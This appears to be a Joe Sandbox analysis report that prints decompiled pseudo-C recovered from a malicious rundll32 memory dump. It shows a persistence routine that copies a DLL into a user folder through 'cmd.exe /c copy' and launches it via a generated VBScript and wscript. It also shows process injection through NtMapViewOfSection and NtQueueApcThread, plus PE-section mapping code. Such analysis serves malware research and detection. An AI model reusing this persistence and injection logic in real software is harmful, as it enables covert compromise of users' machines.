                				void* __r15;
                				void* _t179;
                				signed char _t184;
                				void* _t188;
                				void* _t189;
                				void* _t203;
                				void* _t219;
                				void* _t221;
                				void* _t222;
                				int _t228;
                				signed char _t237;
                				signed char _t241;
                				signed char _t250;
                				void* _t252;
                				void* _t254;
                				void* _t298;
                				intOrPtr _t299;
                				intOrPtr _t301;
                				intOrPtr* _t302;
                				intOrPtr* _t304;
                				intOrPtr* _t305;
                				intOrPtr _t306;
                				intOrPtr _t307;
                				intOrPtr _t309;
                				intOrPtr _t312;
                				char* _t314;
                				void* _t315;
                				intOrPtr _t323;
                				void* _t324;
                				void* _t328;
                				signed int _t372;
                				intOrPtr _t381;
                				void* _t382;
                				void* _t425;
                				void* _t430;
                				void* _t432;
                				void* _t433;
                				void* _t434;
                				signed long long _t458;
                				signed long long _t459;
                				signed long long _t460;
                				void* _t469;
                				signed int _t471;
                				void* _t473;
                				signed long long _t474;
                				void* _t475;
                
                				_t471 = __r12;
                				_t458 = __r9;
                				_t237 = __ebx;
                				_t298 = _t433;
                				_t432 = _t298 - 0x4d8;
                				_t434 = _t433 - 0x5c0;
                				 *((long long*)(_t432 + 0xa8)) = 0xfffffffe;
                				 *((long long*)(_t298 + 8)) = __rbx;
                				 *((long long*)(_t298 + 0x10)) = __rsi;
                				 *((long long*)(_t298 + 0x18)) = __rdi;
                				 *((long long*)(_t298 + 0x20)) = __r12;
                				_t474 = __r9;
                				_t425 = __r8;
                				_t475 = __rdx;
                				_t430 = __rcx;
                				asm("xorps xmm0, xmm0");
                				asm("movdqu [ebp+0x30], xmm0");
                				r12d = 0;
                				 *(_t432 + 0x40) = __r12;
                				 *((intOrPtr*)(_t434 + 0x40)) = r12b;
                				_t179 = E00000285285C8058660(__rbx, _t432 + 0x30, _t434 + 0x40);
                				r9d = 0;
                				_t11 = _t471 + 0x23; // 0x23
                				r8d = _t11;
                				_t314 =  *((intOrPtr*)(_t432 + 0x30));
                				__imp__SHGetSpecialFolderPathA();
                				if (_t179 != 0) goto 0xc8057f52;
                				goto 0xc80585cf;
                				 *(_t434 + 0x78) = __r12;
                				 *((long long*)(_t432 - 0x80)) = __r12;
                				 *((long long*)(_t432 - 0x80)) = 0xf;
                				 *(_t434 + 0x78) = __r12;
                				 *((char*)(_t434 + 0x68)) = 0;
                				if ( *_t314 != 0) goto 0xc8057f77;
                				goto 0xc8057f8a;
                				if ( *((char*)(_t314 + (__r12 | 0xffffffff) + 1)) != 0) goto 0xc8057f80;
                				E00000285285C8056B10(_t314, _t434 + 0x68, _t314, __rcx, (__r12 | 0xffffffff) + 1);
                				if ( *(_t434 + 0x78) != 0) goto 0xc8057faa;
                				goto 0xc8058566;
                				E00000285285C80593D0(_t314, _t434 + 0x48, "\\", _t430, _t432, _t430, _t458);
                				_t459 = _t458 | 0xffffffff;
                				r8d = r8d ^ r8d;
                				E00000285285C8058D60(_t314, _t434 + 0x68, _t298, _t425, _t430, _t432, _t430, _t459);
                				_t299 =  *((intOrPtr*)(_t434 + 0x60));
                				if (_t299 - 0x10 < 0) goto 0xc805802c;
                				_t323 =  *((intOrPtr*)(_t434 + 0x48));
                				if (_t299 + 1 - 0x1000 < 0) goto 0xc8058027;
                				if (0 == 0) goto 0xc8057ffa;
                				0xc80caadc();
                				asm("int3");
                				_t301 =  *((intOrPtr*)(_t323 - 8));
                				if (_t301 - _t323 < 0) goto 0xc8058009;
                				0xc80caadc();
                				asm("int3");
                				_t324 = _t323 - _t301;
                				if (_t324 - 8 >= 0) goto 0xc8058018;
                				0xc80caadc();
                				asm("int3");
                				if (_t324 - 0x27 <= 0) goto 0xc8058024;
                				0xc80caadc();
                				asm("int3");
                				0xc80c51e4();
                				 *((long long*)(_t434 + 0x60)) = 0xf;
                				 *((long long*)(_t434 + 0x58)) = __r12;
                				 *((char*)(_t434 + 0x48)) = 0;
                				_t302 = _t434 + 0x68;
                				if (_t425 == _t302) goto 0xc805805d;
                				_t460 = _t459 | 0xffffffff;
                				r8d = 0;
                				E00000285285C8056C40(_t314, _t425, _t434 + 0x68, _t425, _t430, _t430, _t460);
                				if ( *((char*)(_t432 + 0x500)) == 0) goto 0xc8058070;
                				goto 0xc8058566;
                				_t328 =  >=  ?  *((void*)(_t434 + 0x68)) : _t434 + 0x68;
                				_t184 = GetFileAttributesA(??);
                				if (_t184 == 0xffffffff) goto 0xc8058097;
                				if ((_t184 & 0x00000010) == 0) goto 0xc8058097;
                				goto 0xc8058566;
                				 *((long long*)(_t432 + 0x20)) = __r12;
                				 *((long long*)(_t432 + 0x28)) = __r12;
                				 *((long long*)(_t432 + 0x28)) = 0xf;
                				 *((long long*)(_t432 + 0x20)) = __r12;
                				 *((char*)(_t432 + 0x10)) = 0;
                				r8d = 7;
                				E00000285285C8056B10(_t314, _t432 + 0x10, "\"mkdir ", _t430, _t430);
                				_t461 = _t460 | 0xffffffff;
                				r8d = r8d ^ r8d;
                				E00000285285C8058D60(_t314, _t432 + 0x10, _t425, _t425, _t430, _t432, _t430, _t460 | 0xffffffff);
                				r8d = 1;
                				E00000285285C8058C10(_t314, _t432 + 0x10, "\"", _t425, _t432, _t430);
                				_t188 = E00000285285C80593D0(_t314, _t434 + 0x48, "cmd.exe /c ", _t430, _t432, _t432 + 0x10, _t460 | 0xffffffff);
                				if ( *((long long*)(_t302 + 0x18)) - 0x10 < 0) goto 0xc8058111;
                				_t189 = E00000285285C809B510(_t188, _t252, _t314,  *_t302, "cmd.exe /c ");
                				E00000285285C8056820(_t189, 0, _t434 + 0x48);
                				if (_t189 == 0) goto 0xc8058130;
                				0xc8057e80();
                				E00000285285C8059490(_t314, _t434 + 0x48, _t434 + 0x68, _t430, _t432, "\\", _t461);
                				E00000285285C8056820(E00000285285C80595D0(_t432 + 0x88,  *_t302, _t425, _t430, _t432, _t475, _t461), _t189, _t434 + 0x48);
                				r8d = 4;
                				E00000285285C8058C10(_t314, _t432 + 0x88, ".dll", _t425, _t432, _t475);
                				 *((long long*)(_t432 + 0x58)) = __r12;
                				 *((long long*)(_t432 + 0x60)) = __r12;
                				 *((long long*)(_t432 + 0x60)) = 0xf;
                				 *((long long*)(_t432 + 0x58)) = __r12;
                				 *((char*)(_t432 + 0x48)) = 0;
                				if ( *((long long*)(_t474 + 0x10)) != 0) goto 0xc80581c7;
                				r8d = 0x208;
                				E00000285285C80C8EF0(_t189, 0, 1, _t254, _t432 + 0x2b0, ".dll", _t425, _t475);
                				r8d = 0x208;
                				GetModuleFileNameA(??, ??, ??);
                				goto 0xc80581e3;
                				_t304 = _t432 + 0x48;
                				if (_t304 == _t474) goto 0xc80581e3;
                				r8d = 0;
                				E00000285285C8056C40(_t314, _t432 + 0x48, _t474, _t425, _t430, _t475, _t461 | 0xffffffff);
                				 *((long long*)(_t432 - 0x20)) = __r12;
                				 *((long long*)(_t432 - 0x18)) = __r12;
                				 *((long long*)(_t432 - 0x18)) = 0xf;
                				 *((long long*)(_t432 - 0x20)) = __r12;
                				 *((char*)(_t432 - 0x30)) = 0;
                				r8d = 6;
                				E00000285285C8056B10(_t314, _t432 - 0x30, "\"copy ", _t430, _t475);
                				r8d = r8d ^ r8d;
                				E00000285285C8058D60(_t314, _t432 - 0x30, _t432 + 0x48, _t425, _t430, _t432, _t475, _t461 | 0xffffffffffffffff);
                				E00000285285C8058C10(_t314, _t432 - 0x30, " ", _t425, _t432, _t425);
                				r8d = 0;
                				E00000285285C8058D60(_t314, _t432 - 0x30, _t432 + 0x88, _t425, _t430, _t432, _t425, _t461 | 0xffffffffffffffff);
                				E00000285285C8058C10(_t314, _t432 - 0x30, "\"", _t425, _t432, _t425);
                				_t203 = E00000285285C80593D0(_t314, _t434 + 0x48, "cmd.exe /c ", _t430, _t432, _t432 - 0x30, _t461 | 0xffffffffffffffff);
                				if ( *((long long*)(_t304 + 0x18)) - 0x10 < 0) goto 0xc8058283;
                				_t305 =  *_t304;
                				_t250 = E00000285285C809B510(_t203, _t189, _t314, _t305, "cmd.exe /c ");
                				E00000285285C8056820(_t204, 0, _t434 + 0x48);
                				if (_t250 == 0) goto 0xc80582a2;
                				_t241 = _t250;
                				0xc8057e80();
                				r8d = 0x200;
                				E00000285285C80C8EF0(_t241, 0, _t250, _t254, _t432 + 0xb0, "cmd.exe /c ", _t425, _t432 - 0x30);
                				 *((intOrPtr*)(_t432 - 0x58)) = 0x100;
                				GetUserNameW(??, ??);
                				E00000285285C8059490(_t314, _t432 + 0x68, _t434 + 0x68, _t430, _t432, "\\", _t461 | 0xffffffffffffffff);
                				E00000285285C80595D0(_t432 - 0x78, _t305, _t425, _t430, _t432, _t475, _t461 | 0xffffffffffffffff);
                				E00000285285C8056820(E00000285285C8056820(E00000285285C8059550(_t432 - 0x10, _t305, _t425, _t432, ".mbx"), _t241, _t432 - 0x78), _t241, _t432 + 0x68);
                				 *((long long*)(_t434 + 0x58)) = __r12;
                				 *((long long*)(_t434 + 0x60)) = __r12;
                				 *((long long*)(_t434 + 0x60)) = 7;
                				 *((long long*)(_t434 + 0x58)) = __r12;
                				 *((intOrPtr*)(_t434 + 0x48)) = r12w;
                				r8d = 0xb;
                				E00000285285C8058AC0(_t314, _t434 + 0x48, L"wscript.exe", _t430, ".mbx");
                				E00000285285C80593D0(_t314, _t432 + 0x68, "/E:vbscript ", _t430, _t432, _t432 - 0x10, _t461 | 0xffffffffffffffff);
                				if ( *((long long*)(_t305 + 0x18)) - 0x10 < 0) goto 0xc8058370;
                				_t306 =  *_t305;
                				 *((long long*)(_t434 + 0x30)) = _t434 + 0x48;
                				E00000285285C8056820(E00000285285C8096780(_t237, _t241, _t189, _t314, "/E:vbscript ", _t425, _t430, _t432 + 0xb0, _t306, _t469, _t474), _t241, _t432 + 0x68);
                				if ( *((intOrPtr*)(_t434 + 0x60)) - 8 < 0) goto 0xc80583b1;
                				E00000285285C8058F90(0, _t314,  *((intOrPtr*)(_t434 + 0x48)), _t425, _t430,  *((intOrPtr*)(_t434 + 0x60)) + 1, _t306);
                				 *((long long*)(_t434 + 0x60)) = 7;
                				 *((long long*)(_t434 + 0x58)) = __r12;
                				 *((intOrPtr*)(_t434 + 0x48)) = r12w;
                				 *(_t432 - 0x40) = __r12;
                				 *((long long*)(_t432 - 0x38)) = __r12;
                				 *((long long*)(_t432 - 0x38)) = 0xf;
                				 *(_t432 - 0x40) = __r12;
                				 *((char*)(_t432 - 0x50)) = 0;
                				r8d = 0x6b;
                				E00000285285C8056B10(_t314, _t432 - 0x50, "Set objShell = CreateObject(\"Wscript.Shell\")\r\nobjShell.Run \"rundll32.exe my_application_path, LLBMPMUsqf\"\r\n", _t430,  *((intOrPtr*)(_t434 + 0x60)) + 1);
                				 *((long long*)(_t432 - 0x68)) = __r12;
                				 *((long long*)(_t432 - 0x60)) = __r12;
                				 *((long long*)(_t432 - 0x60)) = 0xf;
                				 *((long long*)(_t432 - 0x68)) = __r12;
                				 *((char*)(_t432 - 0x78)) = 0;
                				r8d = 0x13;
                				_t219 = E00000285285C8056B10(_t314, _t432 - 0x78, "my_application_path", _t430,  *((intOrPtr*)(_t434 + 0x60)) + 1);
                				_t416 =  >=  ?  *((void*)(_t432 - 0x78)) : _t432 - 0x78;
                				r8d = 0;
                				E00000285285C8056A20(_t219, _t432 - 0x50,  >=  ?  *((void*)(_t432 - 0x78)) : _t432 - 0x78,  *((intOrPtr*)(_t434 + 0x60)) + 1,  *((intOrPtr*)(_t432 - 0x68)));
                				if (_t306 == 0xffffffff) goto 0xc805849d;
                				asm("o16 nop [eax+eax]");
                				 *((long long*)(_t434 + 0x28)) = 0xffffffff;
                				 *((long long*)(_t434 + 0x20)) = __r12;
                				_t221 = E00000285285C8059920(_t432 - 0x50, _t306, _t306,  *((intOrPtr*)(_t432 - 0x68)), _t432 + 0x88, __r12, _t473, _t475);
                				_t419 =  >=  ?  *((void*)(_t432 - 0x78)) : _t432 - 0x78;
                				_t222 = E00000285285C8056A20(_t221, _t432 - 0x50,  >=  ?  *((void*)(_t432 - 0x78)) : _t432 - 0x78,  *((intOrPtr*)(_t432 - 0x68)) + _t306,  *((intOrPtr*)(_t432 - 0x68)));
                				if (_t306 != 0xffffffff) goto 0xc8058450;
                				E00000285285C8056820(_t222, _t241, _t432 - 0x78);
                				_t421 =  >=  ?  *((void*)(_t432 - 0x50)) : _t432 - 0x50;
                				_t368 =  >=  ?  *((void*)(_t432 - 0x10)) : _t432 - 0x10;
                				r8d =  *(_t432 - 0x40);
                				E00000285285C809A9C8(_t306, _t314,  >=  ?  *((void*)(_t432 - 0x10)) : _t432 - 0x10,  >=  ?  *((void*)(_t432 - 0x50)) : _t432 - 0x50, _t430,  *((intOrPtr*)(_t432 - 0x68)));
                				E00000285285C80593D0(_t314, _t432 + 0x68, "wscript.exe /E:vbscript ", _t430, _t432, _t432 - 0x10,  *((intOrPtr*)(_t432 - 0x68)));
                				E00000285285C8056820(E00000285285C8058900(_t241, _t314, _t432 - 0x10, _t306), _t241, _t432 + 0x68);
                				_t372 =  *0xc81532c8; // 0x0
                				if (_t372 == 0) goto 0xc805850f;
                				_t228 = CloseHandle(??);
                				 *0xc81532c8 = _t471;
                				_t374 =  >=  ?  *((void*)(_t432 - 0x10)) : _t432 - 0x10;
                				E00000285285C8056820(E00000285285C8056820(E00000285285C8056820(E00000285285C8056820(E00000285285C8056820(E00000285285C8056820(E00000285285C809B510(_t228, _t189, _t314,  >=  ?  *((void*)(_t432 - 0x10)) : _t432 - 0x10, _t306), _t241, _t432 - 0x50), _t241, _t432 - 0x10), _t241, _t432 - 0x30), _t241, _t432 + 0x48), _t241, _t432 + 0x88), _t241, _t432 + 0x10);
                				_t307 =  *((intOrPtr*)(_t432 - 0x80));
                				if (_t307 - 0x10 < 0) goto 0xc80585bd;
                				_t381 =  *((intOrPtr*)(_t434 + 0x68));
                				if (_t307 + 1 - 0x1000 < 0) goto 0xc80585b8;
                				if ((_t241 & 0x0000001f) == 0) goto 0xc805858b;
                				0xc80caadc();
                				asm("int3");
                				_t309 =  *((intOrPtr*)(_t381 - 8));
                				if (_t309 - _t381 < 0) goto 0xc805859a;
                				0xc80caadc();
                				asm("int3");
                				_t382 = _t381 - _t309;
                				if (_t382 - 8 >= 0) goto 0xc80585a9;
                				0xc80caadc();
                				asm("int3");
                				if (_t382 - 0x27 <= 0) goto 0xc80585b5;
                				0xc80caadc();
                				asm("int3");
                				0xc80c51e4();
                				 *((long long*)(_t432 - 0x80)) = 0xf;
                				 *(_t434 + 0x78) = _t471;
                				 *((char*)(_t434 + 0x68)) = 0;
                				if (_t314 == 0) goto 0xc805862f;
                				if ( *(_t432 + 0x40) - _t314 - 0x1000 < 0) goto 0xc805861b;
                				if ((_t237 & 0x0000001f) == 0) goto 0xc80585ee;
                				0xc80caadc();
                				asm("int3");
                				_t312 =  *((intOrPtr*)(_t314 - 8));
                				if (_t312 - _t314 < 0) goto 0xc80585fd;
                				0xc80caadc();
                				asm("int3");
                				_t315 = _t314 - _t312;
                				if (_t315 - 8 >= 0) goto 0xc805860c;
                				0xc80caadc();
                				asm("int3");
                				if (_t315 - 0x27 <= 0) goto 0xc8058618;
                				0xc80caadc();
                				asm("int3");
                				0xc80c51e4();
                				asm("xorps xmm0, xmm0");
                				asm("movdqu [ebp+0x30], xmm0");
                				 *(_t432 + 0x40) = _t471;
                				return 3;
                			}


                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: FolderPathSpecial
                • String ID: "copy $"mkdir $.dll$.mbx$/E:vbscript $Set objShell = CreateObject("Wscript.Shell")objShell.Run "rundll32.exe my_application_path, LLBMPMUsqf"$cmd.exe /c $my_application_path$wscript.exe$wscript.exe /E:vbscript
                • API String ID: 994120019-2262109626
                • Opcode ID: b2a2ead585b8c65e9c79336ff782dd2f481bb5d4a3e724b700016a1cd6d63441
                • Instruction ID: ec4a595de92964548ab8055c113b09bc544b13e598a821132d5af4fff7ab1624
                • Opcode Fuzzy Hash: b2a2ead585b8c65e9c79336ff782dd2f481bb5d4a3e724b700016a1cd6d63441
                • Instruction Fuzzy Hash: 0422D03A212F60D5FB10DB64D8587DD27A1F7413A8F908613EE6923AEADF38C548CB54
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E00000285285C80E3DE8(void* __ecx, void* __edx, void* __eflags, intOrPtr* __rax, long long __rbx, signed char* __rcx, void* __r9, long long _a8, signed int _a16, signed int _a24) {
                				void* __rdi;
                				void* __rsi;
                				void* _t26;
                				signed char _t36;
                				signed int _t38;
                				void* _t40;
                				signed int _t43;
                				void* _t45;
                				void* _t46;
                				signed int _t60;
                				signed char* _t67;
                				void* _t75;
                				intOrPtr* _t90;
                				signed char* _t92;
                				signed int* _t93;
                				signed char* _t96;
                				signed char* _t97;
                				signed char* _t98;
                				signed char* _t99;
                				signed char* _t100;
                				signed char* _t101;
                				signed char* _t102;
                				signed char* _t107;
                				signed char* _t111;
                				signed long long _t118;
                				signed long long _t119;
                				intOrPtr* _t122;
                				void* _t134;
                
                				_t90 = __rax;
                				_a8 = __rbx;
                				E00000285285C80E3D50(_t26);
                				r14d = 0;
                				_a16 = r14d;
                				_t122 = _t90;
                				_a24 = r14d;
                				if (E00000285285C80E3DB8(__edx, _t90,  &_a16) != 0) goto 0xc80e4021;
                				if (E00000285285C80E3D58(__edx, _t90,  &_a24) != 0) goto 0xc80e400c;
                				_t107 =  *0xc8152f98; // 0x0
                				_t67 = _t107;
                				if (_t67 == 0) goto 0xc80e3e65;
                				r9d = __rcx[_t107 - __rcx] & 0x000000ff;
                				if (_t67 != 0) goto 0xc80e3e5d;
                				_t92 =  &(__rcx[1]);
                				if (r9d != 0) goto 0xc80e3e48;
                				if (( *__rcx & 0x000000ff) - r9d == 0) goto 0xc80e3fbc;
                				E00000285285C80DA780(_t92, _t107);
                				_t119 = _t118 | 0xffffffff;
                				if (__rcx[_t119 + 1] != r14b) goto 0xc80e3e71;
                				E00000285285C80D3D7C(_t92, _t119 + 2);
                				 *0xc8152f98 = _t92;
                				E00000285285C80DA780(_t92, _t119 + 2);
                				_t111 =  *0xc8152f98; // 0x0
                				if (_t111 == 0) goto 0xc80e3fbc;
                				_t120 = _t119 + 1;
                				if (__rcx[_t119 + 1] != r14b) goto 0xc80e3ea0;
                				if (E00000285285C80DBDB0(( *__rcx & 0x000000ff) - r9d, _t92, _t111, _t119 + 2, __rcx) != 0) goto 0xc80e3ff7;
                				_t10 =  &(_t92[3]); // 0x3
                				r13d = _t10;
                				r9d = r13d;
                				_t11 =  &(_t92[0x40]); // 0x40
                				if (E00000285285C80DE758(_t11, _t92, __rcx,  *_t122, _t119 + 2, __r9) != 0) goto 0xc80e3fe2;
                				_t75 =  *__rcx - r14b;
                				if (_t75 == 0) goto 0xc80e3eeb;
                				_t96 =  &(__rcx[1]);
                				if (_t75 != 0) goto 0xc80e3edd;
                				dil =  *_t96 == 0x2d;
                				if (dil == 0) goto 0xc80e3efa;
                				_t97 =  &(_t96[1]);
                				_a16 = E00000285285C80DBE3C(_t11, _t92, _t97, _t97, _t120 - 1, _t122, __r9) * 0xe10;
                				_t36 =  *_t97;
                				if (_t36 == 0x2b) goto 0xc80e3f17;
                				if (_t36 - 0x30 - 9 > 0) goto 0xc80e3f1c;
                				_t98 =  &(_t97[1]);
                				goto 0xc80e3f0b;
                				if ( *_t98 != 0x3a) goto 0xc80e3f6d;
                				_t99 =  &(_t98[1]);
                				_t38 = E00000285285C80DBE3C(E00000285285C80DBE3C(_t11, _t92, _t97, _t97, _t120 - 1, _t122, __r9) * 0xe10, _t92, _t99, _t99, _t120 - 1, _t122, __r9);
                				_a16 = _a16 + _t38 * 0x3c;
                				goto 0xc80e3f40;
                				if (_t38 - 0x39 > 0) goto 0xc80e3f46;
                				_t100 =  &(_t99[1]);
                				if ( *_t100 - 0x30 >= 0) goto 0xc80e3f39;
                				if ( *_t100 != 0x3a) goto 0xc80e3f6d;
                				_t101 =  &(_t100[1]);
                				_t40 = E00000285285C80DBE3C(_a16 + _t38 * 0x3c, _t92, _t101, _t101, _t120 - 1, _t122, __r9);
                				_t60 = _a16 + _t40;
                				_a16 = _t60;
                				goto 0xc80e3f67;
                				if (_t40 - 0x39 > 0) goto 0xc80e3f6d;
                				_t102 =  &(_t101[1]);
                				if ( *_t102 - 0x30 >= 0) goto 0xc80e3f60;
                				if (dil == 0) goto 0xc80e3f77;
                				_a16 =  ~_t60;
                				_t43 = r14d & 0xffffff00 |  *_t102 != r14b;
                				_a24 = _t43;
                				if (_t43 == 0) goto 0xc80e3fa1;
                				if (E00000285285C80DE758(0x40, _t92, _t102,  *((intOrPtr*)(_t122 + 8)), _t119 + 2, _t134) == 0) goto 0xc80e3fa8;
                				goto 0xc80e3fcd;
                				_t93 =  *((intOrPtr*)(_t122 + 8));
                				 *_t93 = r14b;
                				_t45 = E00000285285C80E3D48(_t44);
                				 *_t93 = _a16;
                				_t46 = E00000285285C80E3D38(_t45);
                				 *_t93 = _a24;
                				return _t46;
                			}


                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                • String ID: ?
                • API String ID: 3440502458-1684325040
                • Opcode ID: dc1927210b812cc2526de8ced73877b5a23a1320a393b12373780dc02b73dedc
                • Instruction ID: 98f59d837a444bfe17ad1be08f6f3f47c3575d5353fdd977a45146df76e1b591
                • Opcode Fuzzy Hash: dc1927210b812cc2526de8ced73877b5a23a1320a393b12373780dc02b73dedc
                • Instruction Fuzzy Hash: 8EE1F73A212FA08AF7649F35A84979B7BA1F785784F44D12BEA8957B95CF3CC4418F00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 22%
                			E00000285285C8057AE0(long long* __rax, void* __rcx, void* __rdx, void* __r8, long long __r13, char _a8, char _a24, char _a32) {
                				long long _v56;
                				char _v64;
                				char _v72;
                				intOrPtr _v80;
                				intOrPtr _v88;
                				intOrPtr _v96;
                				long long _v104;
                				long long _v112;
                				long long _v120;
                				void* __rbx;
                				void* __rdi;
                				void* __rsi;
                				void* _t35;
                				void* _t49;
                				void* _t50;
                				void* _t51;
                				long long* _t60;
                				void* _t94;
                				void* _t103;
                
                				_t94 = __rdx;
                				if ( *((long long*)(__r8 + 0x18)) - 0x10 < 0) goto 0xc8057aff;
                				goto 0xc8057b02;
                				_t103 = __r8;
                				r15d =  *((intOrPtr*)(__r8 + 0x10));
                				GetModuleHandleW(??);
                				GetProcAddress(??, ??);
                				GetProcAddress(??, ??);
                				 *__rax();
                				 *__rax();
                				if (__rcx == 0) goto 0xc8057c94;
                				_v56 = __r13;
                				r13d = 0;
                				_a8 = __r13;
                				_a32 = __r13;
                				_v72 = __r13;
                				if (E00000285285C809AB8C(r15d, __rax, __rax,  &_a32, __rax, __rdx,  &_a8) != 0) goto 0xc8057c2c;
                				_v64 = __r13;
                				_a24 = __r13;
                				GetModuleHandleW(??);
                				GetProcAddress(??, ??);
                				GetProcAddress(??, ??);
                				_v80 = 0x40;
                				_v88 = r13d;
                				_v96 = 2;
                				r9d = 0;
                				_v104 =  &_v64;
                				_t60 =  &_a24;
                				_v112 = _t60;
                				_v120 = __r13;
                				_t35 =  *__rax();
                				if ( *__rax() != 0) goto 0xc8057c2c;
                				r8d = r15d;
                				E00000285285C80C7310(_t35, _t49, _t50, _t51, _a32, _t103, __rax, _t94,  &_v72);
                				if (_t94 == 0) goto 0xc8057c6f;
                				GetModuleHandleW(??);
                				GetProcAddress(??, ??);
                				r9d = 0;
                				_v120 = r13d;
                				r8d = 0;
                				 *_t60();
                				CloseHandle(??);
                				CloseHandle(??);
                				CloseHandle(??);
                				CloseHandle(??);
                				return 1;
                			}


                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Handle$AddressProc$Close$Module
                • String ID: @$NtMapViewOfSection$NtQueueApcThread$NtResumeProcess$RtlNtStatusToDosError$ntdll.dll
                • API String ID: 2187694145-438560624
                • Opcode ID: dc3c75fc500df8ae811baa38a3a033ea3aa25aaf20d7cbbc2de829c7185a290e
                • Instruction ID: c77e6d0686818c95406620c140f164c27b7742d6b0afd73a34da44d5bdc02796
                • Opcode Fuzzy Hash: dc3c75fc500df8ae811baa38a3a033ea3aa25aaf20d7cbbc2de829c7185a290e
                • Instruction Fuzzy Hash: 1A413B7E206F9096EA60DB51F85879A73A0FB8ABD5F448026DE4D13754DF7CC149CB01
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 27%
                			E00000285285C8099E18(long long __rbx, void* __rcx, long long __rdx, long long __r8, void* __r9, long long _a8, void* _a16, long long _a24, intOrPtr _a40) {
                				long long _v64;
                				void* _v72;
                				char _v80;
                				char _v88;
                				char _v96;
                				char _v104;
                				signed int _v120;
                				void* __rdi;
                				void* __rsi;
                				void* __rbp;
                				void* _t65;
                				intOrPtr _t69;
                				char _t70;
                				void* _t71;
                				intOrPtr _t93;
                				void* _t95;
                				void* _t106;
                				long long _t112;
                				signed long long _t115;
                				long long* _t119;
                				long long _t120;
                				intOrPtr* _t128;
                				void* _t148;
                				long long _t154;
                				long long _t157;
                				intOrPtr _t158;
                				void* _t160;
                				long long _t168;
                				void* _t171;
                				void* _t172;
                				void* _t173;
                				void* _t175;
                				void* _t179;
                
                				_t170 = __r9;
                				_t120 = __rbx;
                				_a8 = __rbx;
                				_a24 = __r8;
                				_a16 = __rdx;
                				_t112 =  *((intOrPtr*)(__rcx + 8));
                				_v96 = __rdx;
                				_t179 = __rcx;
                				_t172 = __r9;
                				_a16 = __rdx;
                				_v104 = __rdx;
                				r12d =  *((intOrPtr*)(__rcx + 0x24));
                				_v72 = __rdx;
                				_v80 = __rdx;
                				_v88 = __rdx;
                				_v64 = _t112;
                				_a40 =  *((intOrPtr*)(__rcx + 0x14));
                				if (_t112 != 0) goto 0xc8099e7c;
                				goto 0xc809a0b6;
                				_t113 =  *0xc8144e7c;
                				r14d =  *( *0xc8144e7c + "is program cannot be run in DOS mode.\r\r\n$");
                				r14d = r14d + 0xfff;
                				r14d = r14d & 0xfffff000;
                				if (E00000285285C809AB8C(_t173 + 0x2578,  *0xc8144e7c, __rbx,  &_v96, _t154, _t157,  &_v80) != 0) goto 0xc809a069;
                				if (E00000285285C809AA5C( *0xc8144e7c, _t120, _v80, _t172, _t160,  &_a16) != 0) goto 0xc809a069;
                				r9d = 0;
                				_v120 = _v120 & 0;
                				if (E00000285285C809ACE8(0,  *0xc8144e7c, _t120, _v96, 0xc8144e40, _t157, _t160, _a16, _t170, _t171) != 0) goto 0xc809a069;
                				_t93 = _a40;
                				r12d =  ==  ? _t93 : r12d;
                				_t65 = E00000285285C809AB8C(r12d, _t113, _t120,  &_v104, _t154, _t157,  &_v88);
                				_t158 = _v88;
                				if (_t65 != 0) goto 0xc809a065;
                				_t168 =  &_v72;
                				if (E00000285285C809AA5C(_t113, _t120, _t158, _t172, _t160, _t168) != 0) goto 0xc809a065;
                				r8d = _t93;
                				E00000285285C80C7310(r12d, _t93, 0, _t95, _v104, _v64, _v104, _t158, _t168);
                				_t128 = _t179 + 0x28;
                				r8d = 0;
                				r13d = r14d;
                				_t175 = _v96 + _t172;
                				 *((long long*)(_t175 + 0x150)) = _a16;
                				 *((long long*)(_t175 + 0x28)) = _t168;
                				_t115 = _v72;
                				 *(_t175 + 0x30) = _t115;
                				 *((intOrPtr*)(_t175 + 0x40)) =  *((intOrPtr*)(_t179 + 0x18));
                				 *((intOrPtr*)(_t175 + 0x38)) = r8d;
                				 *((intOrPtr*)(_t175 + 0x3c)) = r12d;
                				_t69 =  *((intOrPtr*)(_t179 + 0x1c));
                				 *((intOrPtr*)(_t175 + 0x44)) = _t69;
                				if ( *((intOrPtr*)(_t128 + (_t115 | 0xffffffff) + 1)) != r8b) goto 0xc8099f91;
                				if (_t69 == 0) goto 0xc8099fb1;
                				_t148 = _t175 + 0x50 - _t128;
                				_t70 =  *_t128;
                				 *((char*)(_t148 + _t128)) = _t70;
                				if (_t70 != 0) goto 0xc8099fa5;
                				_t71 = E00000285285C8099CF0((_t115 | 0xffffffff) + 1, _t120, _t175, _t158);
                				_t106 = _t71;
                				if (_t106 != 0) goto 0xc809a069;
                				_t50 = _t148 + 0x40; // 0x80
                				r8d = _t50;
                				asm("movups xmm0, [ecx]");
                				asm("movups [eax], xmm0");
                				asm("movups xmm1, [ecx+0x10]");
                				asm("movups [eax+0x10], xmm1");
                				asm("movups xmm0, [ecx+0x20]");
                				asm("movups [eax+0x20], xmm0");
                				asm("movups xmm1, [ecx+0x30]");
                				asm("movups [eax+0x30], xmm1");
                				asm("movups xmm0, [ecx+0x40]");
                				asm("movups [eax+0x40], xmm0");
                				asm("movups xmm1, [ecx+0x50]");
                				asm("movups [eax+0x50], xmm1");
                				asm("movups xmm0, [ecx+0x60]");
                				asm("movups [eax+0x60], xmm0");
                				_t119 = _t175 + 0x168 + _t168;
                				asm("movups xmm1, [ecx+0x70]");
                				asm("movups [eax-0x10], xmm1");
                				if (_t106 != 0) goto 0xc8099fd8;
                				GetModuleHandleW(??);
